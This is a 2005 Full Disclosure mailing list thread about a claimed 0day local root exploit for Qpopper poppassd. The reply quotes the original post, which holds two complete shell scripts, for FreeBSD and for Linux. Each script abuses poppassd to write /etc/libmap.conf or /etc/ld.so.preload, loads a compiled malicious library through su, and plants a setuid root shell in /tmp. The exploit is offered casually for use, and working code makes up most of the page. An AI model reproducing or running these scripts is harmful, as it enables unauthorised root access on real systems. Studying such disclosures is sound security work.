Full Disclosure mailing list archives
Re: It's time for some warez - Qpopper poppassd local r00t exploit
From: kcope <kingcope () gmx net>
Date: Sun, 25 Sep 2005 18:06:38 +0200
lol, yeah you're missing something :-) just give a try on some real box... best regards, kcope Harry Hoffman wrote:
Umm, am I missing something here? It looks like you need to be root to run this "program"?In the fbsd one you are trying to write to /etc which has perms: drwxr-xr-x 17 root wheel 2560 Sep 9 13:49 etc and in the linux one you do a set{gid,uid} to 0. both of these actions will fail without having root priv already. kcope wrote:hello this is kcope,here is my Qpopper poppassd local r00t exploit (latest version, 0day) both for linux and freebsd systems... have fun 8-)#------------------------------------------------------------------------ #!/bin/sh########################################################################### # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ### # tested on FreeBSD 5.4-RELEASE ### ###########################################################################POPPASSD_PATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo ""echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"echo "" sleep 2 umask 0000 if [ -f /etc/libmap.conf ]; then echo "OOPS /etc/libmap.conf already exists.. exploit failed!" exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { remove("/etc/libmap.conf");execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);} } _EOF gcc -o program.o -c program.c -fPICgcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfilescp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 echo "--- Now type ENTER ---" echo "" $POPPASSD_PATH -t /etc/libmap.conf echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf su if [ -f /tmp/xxxx ]; then echo "IT'S A ROOTSHELL!!!" /tmp/xxxx else echo "Sorry, exploit failed." fi------------------------------------------------------------------------ #!/bin/sh########################################################################### # Linux Qpopper poppassd latest version local r00t exploit by kcope #### August 2005 ### # Confidential - Keep Private! ##############################################################################POPPASSD_PATH=/usr/local/bin/poppassd echo "" echo "Linux Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep 2 umask 0000 if [ -f /etc/ld.so.preload ]; then echo "OOPS /etc/ld.so.preload already exists.. exploit failed!" exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { setgid(0); setuid(0); remove("/etc/ld.so.preload");execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);} } _EOF gcc -o program.o -c program.c -fPICgcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfilescat > suid.c << _EOF int main(void) { setgid(0); setuid(0); unlink("/tmp/suid"); execl("/bin/sh","sh",0); } _EOF gcc -o /tmp/suid suid.c cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 echo "--- Now type ENTER ---" echo "" $POPPASSD_PATH -t /etc/ld.so.preload echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload su if [ -f /tmp/suid ]; then echo "IT'S A ROOTSHELL!!!" /tmp/suid else echo "Sorry, exploit failed." fi------------------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- It's time for some warez - Qpopper poppassd local r00t exploit kcope (Sep 24)
- Re: It's time for some warez - Qpopper poppassd local r00t exploit Harry Hoffman (Sep 25)
- Re: It's time for some warez - Qpopper poppassd local r00t exploit kcope (Sep 25)
- Re: It's time for some warez - Qpopper poppassd local r00t exploit Harry Hoffman (Sep 25)